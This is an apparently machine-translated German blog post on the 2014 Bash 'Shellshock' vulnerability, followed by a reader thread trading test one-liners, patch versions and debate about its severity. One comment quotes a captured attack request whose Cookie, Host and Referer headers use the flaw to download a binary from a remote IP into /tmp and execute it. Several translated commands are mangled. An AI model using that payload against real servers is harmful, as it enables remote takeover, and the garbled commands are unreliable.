Bash: Neue Sicherheitsanfälligkeit erkannt (und behoben)

Es läuft wie ein Lauffeuer in einigen Blogs, einer Nachricht, die in der Sicherheitsblog de Red Hat über eine Sicherheitslücke in Bash aufgrund des Missbrauchs globaler Variablen. Nach den ursprünglichen Nachrichten:

„… Die Sicherheitsanfälligkeit beruht auf der Tatsache, dass Umgebungsvariablen mit speziell gestalteten Werten erstellt werden können, bevor die Bash-Shell aufgerufen wird. Diese Variablen können Code enthalten, der ausgeführt wird, sobald die Shell aufgerufen wird. Der Name dieser ausgearbeiteten Variablen spielt keine Rolle, nur deren Inhalt. Infolgedessen ist diese Sicherheitsanfälligkeit in vielen Kontexten offengelegtzum Beispiel:

  • ForceCommand Es wird in SSHD-Konfigurationen verwendet, um eingeschränkten Befehlsausführungsfunktionen für Remotebenutzer bereitzustellen. Dieser Fehler kann verwendet werden, um dies zu vermeiden und eine willkürliche Befehlsausführung bereitzustellen. Einige Git- und Subversion-Implementierungen verwenden solche eingeschränkten Shells. Die regelmäßige Verwendung von OpenSSH ist nicht betroffen, da Benutzer bereits Zugriff auf eine Konsole haben.
  • Der Apache-Server, der mod_cgi oder mod_cgid verwendet, ist betroffen, wenn CGI-Skripte sowohl in Bash- als auch in Spawn-Unterebenen geschrieben werden. Solche Unterebenen werden implizit von system / popen in C, von os.system / os.popen in Python verwendet, wenn eine System / exec-Shell in PHP verwendet wird (im CGI-Modus) und open / system in Perl (abhängig von der Befehlszeichenfolge).
  • Mit mod_php ausgeführte PHP-Skripte sind auch dann nicht betroffen, wenn Unterebenen abgespielt werden.
  • DHCP-Clients rufen Shell-Skripte auf, um das System mit Werten zu konfigurieren, die von einem potenziell bösartigen Server stammen. Dies würde es ermöglichen, beliebige Befehle, normalerweise als root, auf dem DHCP-Client-Computer auszuführen.
  • Verschiedene Daemons und Programme mit SUID-Berechtigungen können Shell-Skripte mit den vom Benutzer festgelegten / beeinflussten Umgebungsvariablenwerten ausführen, wodurch beliebige Befehle ausgeführt werden können.
  • Jede andere Anwendung, die sich mit einer Shell verbindet oder ein Shell-Skript ausführt, wie z. B. bash als Interpreter. Shell-Skripte, die keine Variablen exportieren, sind für dieses Problem nicht anfällig, selbst wenn sie nicht vertrauenswürdigen Inhalt verarbeiten und darin speichern Shell-Variablen (links) und Unterebenen öffnen sich.

... »

Woher wissen, ob meine Bash betroffen ist?

Angesichts dessen gibt es eine sehr einfache Möglichkeit, festzustellen, ob wir von dieser Sicherheitsanfälligkeit betroffen sind. Tatsächlich habe ich auf meinem Antergos getestet und anscheinend habe ich kein Problem. Was wir tun müssen, ist ein Terminal zu öffnen und zu setzen:

env x = '() {:;}; echo verwundbar 'bash -c "echo das ist ein Test"

Wenn es so herauskommt, haben wir kein Problem:

env x = '() {:;}; echo verwundbar 'bash -c "echo dies ist ein Test" bash: Warnung: x: Ignorieren der Funktionsdefinition Versuch bash: Fehler beim Importieren der Funktionsdefinition für' x 'Dies ist ein Test

Wenn das Ergebnis anders ist, können Sie die Aktualisierungskanäle unserer bevorzugten Distributionen verwenden, um festzustellen, ob sie den Patch bereits angewendet haben. Also weißt du 😉

Aktualisiert: Dies ist die Ausgabe eines Kollegen, der Ubuntu 14:04 verwendet:

env x = '() {:;}; echo verwundbar 'bash -c "echo dies ist ein Test" verwundbar dies ist ein Test

Wie Sie sehen können, ist es bisher anfällig.


Hinterlasse einen Kommentar

Ihre E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind markiert mit *

*

*

  1. Verantwortlich für die Daten: Miguel Ángel Gatón
  2. Zweck der Daten: Kontrolle von SPAM, Kommentarverwaltung.
  3. Legitimation: Ihre Zustimmung
  4. Übermittlung der Daten: Die Daten werden nur durch gesetzliche Verpflichtung an Dritte weitergegeben.
  5. Datenspeicherung: Von Occentus Networks (EU) gehostete Datenbank
  6. Rechte: Sie können Ihre Informationen jederzeit einschränken, wiederherstellen und löschen.

  1.   Gerson sagte

    Ich habe Kubuntu 14.04 von 64 und bekomme außerdem:

    env x='() { :;}; echo vulnerable' bash -c "echo das ist ein Test"
    verletzlich
    das ist ein Test

    Ich habe bereits aktualisiert, aber das Problem wird nicht behoben. Machen?

    1.    lebhaft sagte

      Warten Sie, bis sie aktualisiert sind. Bereits eOS zum Beispiel aktualisiert.. 😀

    2.    John sagte

      Das ist seltsam, ich habe auch Kubuntu 14.04

      $ env x='() { :;}; echo vulnerable' bash -c "echo das ist ein Test"
      bash: Warnung: x: Funktionsdefinitionsversuch wird ignoriert
      bash: Fehler beim Importieren der Funktionsdefinition für „x“
      das ist ein Test

      1.    John sagte

        Ich füge hinzu, dass die Version des „bash“-Pakets, die heute heruntergeladen wurde, ist:
        4.3-7ubuntu1.1

        http://packages.ubuntu.com/trusty/bash

    3.    eliotime3000 sagte

      Wenn ich in meinem Fall den Befehl gebe, erhalte ich im Terminal nur Folgendes:

      >

      Der Witz ist jedenfalls, dass ich Debian Wheezy aktualisiert habe und das hat mich rausgeworfen.

      1.    yukiteru sagte

        Wheezy ist immer noch anfällig für den zweiten Teil des Fehlers, zumindest für den Nachmittag (UTC -4: 30) folgte das Problem immer noch: /

  2.   Petercheco sagte

    Ich habe gerade überprüft, dass nach der Installation eines Updates heute Morgen weder Slackware noch Debian noch Centos betroffen sind, da sie das entsprechende Update erhalten haben.

    Was macht Ubuntu derzeit noch angreifbar? Und sag mir, dass es sicher ist: D.

    1.    John sagte

      Aber haben Sie versucht, Ubuntu zu aktualisieren?
      Mit dem heutigen Update haben sie das auch behoben.

      1.    Petercheco sagte

        OK

    2.    robet sagte

      Sicherheitsexperten warnen, dass die Bash-Schwachstelle eine größere Bedrohung für Benutzer von Linux-Software darstellen könnte als die Heartbleed-Schwachstelle, bei der Hacker einen Fehler in Bash ausnutzen können, um die vollständige Kontrolle über ein System zu übernehmen.
      Tod Beardsley, ein technischer Manager des Cybersicherheitsunternehmens Rapid7, warnte davor, dass der Fehler aufgrund seiner Schwere mit 10 bewertet wurde, was bedeutet, dass er die maximale Auswirkung hat, und mit "niedrig" für die Komplexität des Exploits, was bedeutet Das ist relativ einfach für "Hacker" -Angriffe. Durch die Verwendung dieser Sicherheitsanfälligkeit können Angreifer möglicherweise die Kontrolle über das Betriebssystem übernehmen, auf vertrauliche Informationen zugreifen, Änderungen vornehmen usw. ", sagte Beardsley. "Jeder mit Systemen, die Bash belegen, sollte den Patch sofort anwenden", fügte er hinzu.
      Bevor diese Schwachstelle das veraltete Tool (GNU) zur Schau stellt, auf dem Bach gehostet wird, wäre es für Linux-Software bequemer, GNU zu entfernen und auf das BSD-Tool umzusteigen.

      PS: Verurteilen Sie meine Meinungsfreiheit nicht, beleidigen Sie niemanden, löschen Sie meine Nachricht nicht wie die vorherige Nachricht, die gelöscht wurde!

      1.    Xerix sagte

        Oh bitte, übertreibe nicht. Wie ich diese Leute hasse, die BSD verwenden und GNU, Linux oder alles, was aus diesen Projekten kommt, verachten.

      2.    Petercheco sagte

        Ich stimme mit Ihnen überein und Sie haben vollkommen recht, was die Schwere dieses Lochs angeht.

      3.    Diazepan sagte

        Es war keine Zensur, es war Redundanz (Sie hatten den gleichen Kommentar im Gnome-3.14-Beitrag abgegeben)

      4.    Unser Team sagte

        „…und wurde hinsichtlich der Komplexität der Ausnutzung mit „NIEDRIG“ bewertet, was bedeutet, dass sie für Hackerangriffe relativ EINFACH ist.“

        Ist die Inkonsistenz erkennbar?
        Wie kann es einfach sein, die Schwachstelle auszunutzen und gleichzeitig ein „geringes“ Risikoniveau zu haben, weil die Nutzung so komplex ist?
        Es handelt sich um einen Fehler, der einige Stunden nach Bekanntwerden behoben wurde und von dem, wie auch bei Heartbleed, nicht berichtet wurde, dass er ausgenutzt wurde (natürlich hat dies weniger Zeit, um bekannt zu werden).
        Es handelt sich eher um Boulevardpresse als um echtes Risiko.

      5.    Petercheco sagte

        Erscheint Ihnen @Staff unwichtig? Was wirst du mir jetzt sagen?

        GET./.HTTP/1.0
        .User-Agent: .Danke-Rob
        .Cookie:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh; ./tmp/besh;
        .Host:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh; ./tmp/besh;
        .Referer:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh; ./tmp/besh;
        .Akzeptieren:. * / *

        $ Datei nginx
        nginx: Ausführbare ELF-32-Bit-LSB-Datei, Intel 80386, Version 1 (SYSV), statisch verknüpft, für GNU/Linux 2.6.18, entfernt

        $md5sum nginx
        5924bcc045bb7039f55c6ce29234e29a nginx

        $sha256sum nginx
        73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx

        Weißt du was das ist? Überhaupt nichts Gefährliches...

      6.    yukiteru sagte

        Die Situation ist ziemlich ernst, aber von da an bis zu der Aussage, dass Sie aufhören sollten, Bash für eine BSD-Option zu verwenden, das ist das Beste, jedenfalls ist das Update bereits da, ich tippe nur auf „Update“ und sonst nichts.

        Nun zur PS: Ich denke, das ist zu viel, Kumpel @robet. Ich glaube nicht, dass die Admins hier solche Kommentare löschen wollen, nur weil ich dieses Gefühl habe, seit ich Teil dieser Community bin, und ich hoffe, dass das auch so bleibt.

        Grüße.

      7.    lebhaft sagte

        Sie haben genau den gleichen Kommentar in zwei verschiedenen Beiträgen gepostet. Wenn Sie versuchen, „die Quelle“ der Nachrichten zu bewerben, ist dies leider nicht der richtige Ort.

      8.    mario sagte

        Bash stammt von Unix (und seinem GNU-Klon). Auch BSD-basierte Systeme wie OSX sind betroffen und laut Genbeta wurde das Problem noch nicht gepatcht. Ebenso benötigen Sie für den Zugriff auf Bash ein Benutzerkonto, entweder lokal oder über SSH.

      9.    yukiteru sagte

        @Mitarbeiter:

        1.- Aufgrund der Anzahl der Dienste, die von dem Fehler betroffen sein könnten, wurde es als Stufe 10 (maximale Gefahrenstufe) eingestuft. In der Hauptnotiz machen sie diese Tatsache sehr deutlich und argumentieren, dass der Fehler Dienste wie Apache, SSHD und Programme mit SUID-Berechtigungen (unter anderem Xorg) beeinträchtigen kann.

        2.- Es wurde als „Niedriger Schwierigkeitsgrad“ eingestuft, wenn es darum geht, seine Implementierung durchzuführen, und das beste Beispiel dafür ist das Schwachstellentestskript, das @elav in den Beitrag eingefügt hat. Sehr schwer umzusetzen ist es nicht, wie man sieht.

        Ich sehe keine Redundanz in den Informationen (ich sehe nur eine Google-Übersetzung) und wenn das Problem schwerwiegend genug ist und es, wie Sie sagen, bereits einen Patch und eine Lösung gibt, aber nicht aus diesem Grund, stellt es kein Risiko mehr dar, sondern ein ziemlich reales.

      10.    Unser Team sagte

        @petercheco / @Yukiteru

        Verstehen Sie mich nicht falsch, ich denke, es ist klar, dass meine Kritik die Nachrichten betrifft, die Robet verknüpft, und sich auf Inkonsistenz und nicht auf Redundanz konzentriert.

        Ebenso müssen wir zwischen Risiko und Gefahr unterscheiden (das letzte habe ich nicht erwähnt), wir verwenden sie üblicherweise als Synonyme, aber hier wäre Gefahr die Schadenskapazität des Fehlers und Risiko die Wahrscheinlichkeit seines Auftretens.
        In meinem speziellen Fall bin ich seit gestern eingetreten. Es war nicht für Mailinglisten oder ähnliches gedacht, sondern für eine Desktop-Distribution! Ich nahm den Hörer ab und schickte eine Nachricht mit dem Link an den Systemadministrator, und er bestätigte, dass ich bereits alles gepatcht hatte, also entschuldigen Sie, aber diese Nachricht raubt mir nicht den Schlaf.

      11.    robet sagte

        In anderen Foren erwähnen sie die Bash-Sicherheitslücke, „die Lösung, die Debian und Ubuntu herausgebracht haben“, aber heute haben sie entdeckt, dass eine Sicherheitslücke immer noch besteht, sodass die Lösung unvollständig war, das ist es, was sie erwähnen!

        Ich sehe, dass mich viele dafür kritisiert haben, dass ich Menschen vor der Schwere der Sicherheitslücke bewahrt habe, die mit einer Stufe 10 maximaler Gefährlichkeit qualifiziert ist, und mögliche Lösungen für Linux-Software vor dem veralteten GNU-Tool erwähnt habe, in dem Bash perfekt gehostet wird GNU könnte durch das BSD-Tool in Linux Software ersetzt werden. Ich benutze auch Linux und ich mag Linux!

        Ich stelle klar, dass Bash nicht standardmäßig in BSD installiert ist, sondern ein weiteres Linux-Kompatibilitätspaket, das in BSD installiert werden kann ... ja! Und die Quelle wird so angegeben, dass sie die Nachrichten überprüfen können, da viele Benutzer der Nachricht oder dem Kommentar manchmal nicht glauben.

        1.    lebhaft sagte

          robet: Wie sie dir immer wieder gesagt haben, schreibst du deinen Kommentar mit den Neuigkeiten bereits in einen Beitrag, du musst ihn nicht in jeden Beitrag einfügen, den du kommentierst.

          Über Bash, da es andere Befehlsinterpreter gibt, die verwendet werden können, falls Bash anfällig ist. 😉

      12.    mario sagte

        Robet, meines Wissens gibt es keine Software, die den Linux-Kernel mit dem BSD-Userland kombiniert. Das Nächste ist umgekehrt, kBSD + GNU, wie es Gentoo und Debian tun. Außerdem könnte GNU (1983) nicht als "altmodisch" bezeichnet werden, wenn es nach BSD (1977) ist. Beide teilen ihr Unix-Root (aber nicht den Code). Es würde keine "Linux-Kompatibilität" geben, wenn Bash erstellt würde, als Linus T noch ein Kind war.

  3.   manuelperez sagte

    uff, Debian-Tests sind derzeit „anfällig“, was für eine Phase wir gerade haben ...

    1.    mrcelhw sagte

      Ich verwende Debian Testing und selbst in diesem Zweig haben wir das Bash-Update erhalten

  4.   Diazepan sagte

    Laut Genbeta gibt es noch eine weitere Sicherheitslücke
    http://seclists.org/oss-sec/2014/q3/685

    Der abzufragende Befehl lautet
    env X='() { (a)=>\' sh -c "echo vulnerabel"; bash -c „echo Unpatched Failure 2“

    1.    lebhaft sagte
      env X='() { (a)=>\' sh -c "echo vulnerabel"; bash -c „echo Unpatched Bug 2“ sh: X: Zeile 1: Syntaxfehler in der Nähe des unerwarteten Elements „=“ sh:
      
      1.    Diazepan sagte

        das gleiche Ich.

      2.    giskard sagte

        Ebenfalls. Aber der ursprüngliche Fehler im Beitrag wurde in (L)Ubuntu 14.04 behoben

      3.    x11tete11x sagte

        Anstatt ein einfaches Echo auszuführen und zu versuchen, eine Anweisung auszuführen, die Privilegien erfordert, wird bei mir die Fehlermeldung „Unzureichende Privilegien“ angezeigt.

      4.    Xurxo sagte

        Sie haben Recht!! Es gab zwei Schwachstellen...

        Für mich unter Linux Mint 17 nach dem zweiten Bash-Update, das gestern Abend in den Ubuntu-Repositorys abgelegt wurde, gibt die Shell bei der Ausführung dieses Befehls diese Ausgabe aus:

        env X='() { (a)=>\' sh -c „echo vulnerabel“; bash -c „echo Unpatched Failure 2“
        >

        Die Version von „bassh“, die in den Ubuntu-Repositories abgelegt wurde, um die vorherigen zu aktualisieren, ist:

        4.3-7ubuntu1.2

        Auf von Debian abgeleiteten Systemen können Sie die installierte Version mit diesem Befehl überprüfen:

        dpkg -s bash|grep Version

        Auf jeden Fall sollte es geklärt werden, zumindest für Debian-, Ubuntu- und Mint-Benutzer; dass sie sich nicht zu viele Gedanken über Programme machen sollten, die Skripte mit dem Header #!/bin/sh ausführen, da /bin/sh auf diesen Distributionen nicht bash aufruft, sondern stattdessen auf die Dash-Shell verweist (dash ist:)

        Debians Alchemist-Konsole (Dash) ist eine von POSIX abgeleitete Konsole
        von Asche.
        .
        Da es Skripte schneller als Bash ausführt und weniger Abhängigkeiten aufweist
        von Bibliotheken (was es robuster gegen Softwarefehler macht oder
        Hardware) wird sie als Standard-Systemkonsole auf Systemen verwendet
        Debian.

        Zumindest unter Ubuntu wird also „bash“ als Shell für die Benutzeranmeldung verwendet (auch für den Root-Benutzer). Aber jeder Benutzer kann eine andere Standard-Shell für Root- und Benutzerkonsolen (Terminals) verwenden.

        Sie können leicht überprüfen, ob die Shell die Skripte (#!/bin/sh) ausführt, indem Sie die folgenden Befehle ausführen:

        Datei / bin / sh
        (Ausgabe ist /bin/sh: symbolischer Link zu „dash“) Wir folgen der Spur, indem wir den Befehl wiederholen

        Datei / bin / dash
        (Die Ausgabe ist /bin/dash: ELF 64-Bit LSB Shared Object, x86-64, Version 1 (SYSV), also ist dies die ausführbare Datei.

        Dies sind die Ergebnisse für eine Linux Mint 17-Distribution. Bei anderen nicht auf Ubuntu/Debian basierenden Distributionen können sie unterschiedlich sein.

        Es ist nicht schwer, die Standard-Shell zu ändern !! Sie können sogar eine andere für Benutzer und für den Root-Benutzer verwenden. Eigentlich müssen Sie nur die Shell Ihrer Wahl installieren und die Standardeinstellung mit dem Befehl "chsh" oder durch Bearbeiten der Datei / etc / passwd ändern (obwohl Benutzer, die die Folgen eines Fehlers beim Bearbeiten der Datei "passwd" nicht kennen, dies ist Informieren Sie sich besser sehr gut und erstellen Sie vor dem Bearbeiten eine Kopie des Originals, falls eine Wiederherstellung erforderlich ist.

        Ich fühle mich wohler mit „tcsh“ (tcsh ist:)

        Die TENEX C-Konsole, eine verbesserte Version der Berkeley csh

        „csh“ wurde vor einigen Jahren von Mac OS X verwendet. Etwas logisch, wenn man bedenkt, dass ein großer Teil des Apple-Betriebssystems aus FreeBSD-Code besteht. Nach dem, was ich gestern gelesen habe, scheint es, dass sie auch „Bash“ für Benutzerterminals bereitstellen.

        SCHLUSSFOLGERUNGEN:

        – Gepatchte Versionen von „bash“ wurden bereits „für die am häufigsten verwendeten Distributionen“ verteilt
        – Bash-Version 4.3-7ubuntu1.2 und höher enthalten diese Fehler nicht
        – Es ist nicht zwingend erforderlich, „bash“ unter dem Betriebssystem *Linux zu verwenden
        – Nur wenige *Linux-Distributionen verlinken #!/bin/sh mit „bash“
        – Es gibt Alternativen: ash, dash, csh, tcsh und einige mehr
        – Es ist nicht kompliziert, die Standard-Shell zu ändern, die das System beim Öffnen eines Terminals aufruft
        – Nur wenige kleine Geräte (Router und andere) verwenden „bash“, weil es sehr groß ist!!

      5.    Xurxo sagte

        Gerade ist gerade ein weiteres Update eingetroffen, das eine andere Version von „bash“ 4.3-7ubuntu1.3 installiert

        Für Linux Mint 17 und Ubuntu 14.04.1 LTS

        1.    lebhaft sagte

          In ArchLinux ist die Version bash-4.3.026-1 eingetragen

    2.    robet sagte

      @Xurxo….csh aus Berkeley?,…Sie verstehen irgendwie, wovon ich oben spreche, und es ist besser, „csh“ von BSD zu verwenden…anstatt das antiquierte GNU-Tool, auf dem Bash gehostet wird. Dieses Tool eignet sich am besten für Linux-Software.

  5.   nicht benannt sagte

    Ich denke, das ist der Fehler

    https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762760

    wahr?

  6.   Gonzalo sagte

    Und was wäre die Lösung?

    1.    lebhaft sagte

      Warten Sie, bis das Paket in Ihrer Distribution aktualisiert wird 😉

  7.   Diazepan sagte

    Der Fehler wurde Shellshock genannt
    http://www.theregister.co.uk/2014/09/24/bash_shell_vuln/

  8.   Paul Ivan Correa sagte

    verletzlich
    das ist ein Test

    Noch kein Patch für Ubuntu Studio 14.04

    1.    Wisp sagte

      In Ubuntu Studio 14.04.1 behoben
      brizno@ubuntustudio:~$ env x='() { :;}; echo vulnerable' bash -c "echo das ist ein Test"
      bash: Warnung: x: Funktionsdefinitionsversuch wird ignoriert
      bash: Fehler beim Importieren der Funktionsdefinition für „x“
      das ist ein Test

  9.   Roader sagte

    Es handelt sich tatsächlich um eine geringfügige Sicherheitslücke. Wenn Sie davon betroffen sind, liegt das daran, dass Sie zuvor etwas falsch gemacht haben ...

    Denn ein mit Root-Rechten ausgeführtes Bash-Skript sollte niemals einem Benutzer zugänglich gemacht werden. Und wenn Sie unprivilegiert laufen, gibt es keine solche Schwachstelle. Eigentlich ist es Unsinn. Viel Alarmismus.

    1.    Xerix sagte

      Ich denke, das gleiche.

    2.    Unser Team sagte

      Genau, um mehr Zeitungen zu verkaufen oder mehr Besucher zu bekommen, sind diese Käfer gut.
      Aber sie vergessen immer zu erwähnen, dass man, um einen Computer mit solchen Skripten kompromittieren zu können, zuerst Zugriff auf Bash und dann als Root haben muss.

      1.    Daryo sagte

        Wenn Sie einen Apache mit CGI verwenden, fügen Sie einfach die HTTP-Header als Cookies ein oder verweisen Sie auf die Funktion, die Sie ausführen möchten. Es wurde sogar zur Verbreitung von Würmern eingesetzt.

    3.    Daryo sagte

      Und wenn jemand eine Shell mit einem wget mishell.php auf einen Server legt, ist das doch nicht schlimm, oder?

    4.    eliotime3000 sagte

      Ich stimme dir zu. Ich dachte, es sei ein riesiger Fehler wie der in Heartbleed (sogar die NSA bot sich an, die Morbiden zu füttern), aber im Grunde war es ein kleiner Fehler.

      Es gibt noch andere wirklich schwerwiegende Fehler, wie den verrückten Flash-Verbrauch und den Leistungsabfall im Pepper Flash Player, und die wurden bereits behoben webRTC-Fehler in Chrome und Firefox.

  10.   Bindermann sagte

    Wissen Sie, ob es einen Fix für Leute gibt, die Linux Mint 16 haben?

  11.   Oscar sagte

    Im Debian-Test wurde es bereits korrigiert.

  12.   Yoyo sagte

    In meinen 5 Distributionen ist es gelöst, in meinem OS X weiß ich es nicht.

    Bitte zensieren Sie meinen Kommentar nicht, ich habe OS X gesagt. Ich weiß nicht, ob Sie auf dieser Website OS X sagen dürfen.

    1.    Tanhausser sagte

      @yoyo, lass dich nicht zu sehr ausflippen, sie arbeiten immer noch an einigen Details des Patches ... probiere es aus und sag es mir später. XD

      env x='() { :;}; echo vulgaris‘ bash -c „echo Ich bin anfälliger als der iPhone-6-Müll“

      Wenn sie es vor OS X zu 100 % gelöst haben, wette ich darauf

    2.    eliotime3000 sagte

      Nun, selbst auf der Ars Technica messen sie Bash unter OSX Relevanz bei.

    3.    lebhaft sagte

      @Yoyo nächster Kommentar zu OS

  13.   Tanhausser sagte

    @yoyo da müssen wir die Anführungszeichen korrigieren... aber den Rest wisst ihr schon 😉

    1.    eliotime3000 sagte

      Sie gehen unter OSX irgendwie schonend vor (weil OSX immer noch Bash verwendet :v).

      Jedenfalls muss ich mich nicht so sehr mit Debian Jessie herumschlagen.

  14.   elhui2 sagte

    Wenn das System unter Cent OS anfällig ist:
    Lecker, alles sauber && Lecker, Bash aktualisieren

    um die Bash-Version zu sehen:
    U / min -qa | grep bash

    Wenn die Version älter als bash-4.1.2-15.el6_5.1 ist, ist Ihr System möglicherweise anfällig!

    Grüße.

  15.   manuelperez sagte

    2. Schwachstelle noch nicht behoben

    env amvariable2='() { (a)=>\' sh -c "echo amVulnerable"; bash -c „echo Unpatched Failure 2“

  16.   Jesus Perales sagte

    Aktualisierung ...

  17.   Schalter sagte

    Das Gegenteil passiert mir in Gentoo, ich bin nur für den ersten Fehler anfällig, aber beim zweiten erscheint Folgendes:
    [code]sh: X: Zeile 1: Syntaxfehler in der Nähe des unerwarteten Elements „=“
    sh: X: Zeile 1: ''
    sh: Fehler beim Importieren der Funktionsdefinition für „X“
    sh: anfällig: Befehl nicht gefunden
    Ungepatchter Fehler 2
    [/ Code]
    Ich weiß nicht, ob es bereits eine stabile Version von Bash mit den behobenen Fehlern geben wird, aber es wird auf jeden Fall für das nächste Mal ausstehen, wenn ich ein emerge –sync && emerge –update –deep –with-bdeps=y –newuse @world durchführe (so aktualisiere ich das gesamte System).

    1.    yukiteru sagte

      Ich habe Gentoo mit der Version 4.2_p50 und bisher hat es alle Tests bestanden. Versuchen Sie, ein emerge –sync und dann emerge -av1 app-shells/bash auszuführen, und überprüfen Sie dann mit dem Befehl bash –version, ob Sie Version 4.2_p50 haben.

  18.   Fer sagte

    Hast du das versucht?

    Und mit neuen Paketen, einem neuen Test von Red Hat

    cd /tmp; rm -f /tmp/echo; env 'x=() { (a)=>\' bash -c "echo date"; cat /tmp/echo

    Wenn unser System nicht angreifbar ist und korrekt gepatcht wurde, sollte es uns etwa Folgendes anzeigen
    1-Datum
    2 cat: /tmp/echo: Keine solche Datei oder kein solches Verzeichnis

  19.   yukiteru sagte

    Versuchen Sie es so:

    env X='() { (a)=>\' sh -c "echo vulnerabel"; bash -c „echo Bug 2 gepatcht“

    Ich bekomme

    verletzlich
    Bug 2 gepatcht.

    1.    yukiteru sagte

      Vergessen Sie es, die Zeile ist falsch formatiert.

  20.   Oskar Mesa sagte

    Ausgezeichnet! Ich habe das Update bereits in meiner Slackware durchgeführt, danke!

  21.   Lothbrok sagte

    Hallo, ich habe eine Frage, ich habe mehrere Server mit „SUSE Linux Enterprise Server 10“ 64-Bit.
    Wenn ich die Befehle ausführe, bin ich angreifbar, sogar noch anfälliger als der Müll des iPhone 6 xD
    Wenn ich mich nicht irre, erfolgt die Aktualisierung/Installation von Paketen in SUSE mit dem Befehl „zypper“.

    Auf einigen Servern wird mir Folgendes angezeigt:

    BIAL: ~ # zypper up
    -bash: zypper: Befehl nicht gefunden
    BIAL: ~ #

    Und in anderen das:

    SMB: ~ # zypper up
    Systemquellen werden wiederhergestellt…
    Parsen von Metadaten für SUSE Linux Enterprise Server 10 SP2-20100319-161944…
    Parsen der RPM-Datenbank…
    Zusammenfassung:
    Nichts zu tun.

    Was ich mache?
    Ich weiß, dass die Verletzlichkeit, sagen manche, geringer ist, als sie es darstellen, aber ich habe sie und möchte keinem Risiko ausgesetzt sein, sei es klein oder groß.

    Grüße.

  22.   Sanders gutierrez sagte

    Guten Abend, ich habe versucht, den im Artikel bereitgestellten Code einzufügen, ich verstehe Folgendes
    sanders@pc-sanders:~$ env x='() { :;}; echo vulnerable' bash -c "echo das ist ein Test"
    das ist ein Test
    sanders@pc-sanders:~$
    Könnten Sie mir bitte erklären, wie ich die Distribution patchen kann? Ich mache täglich Updates und sehe keine Änderungen in der Ausgabe der Eingabeaufforderung.

    Vielen Dank!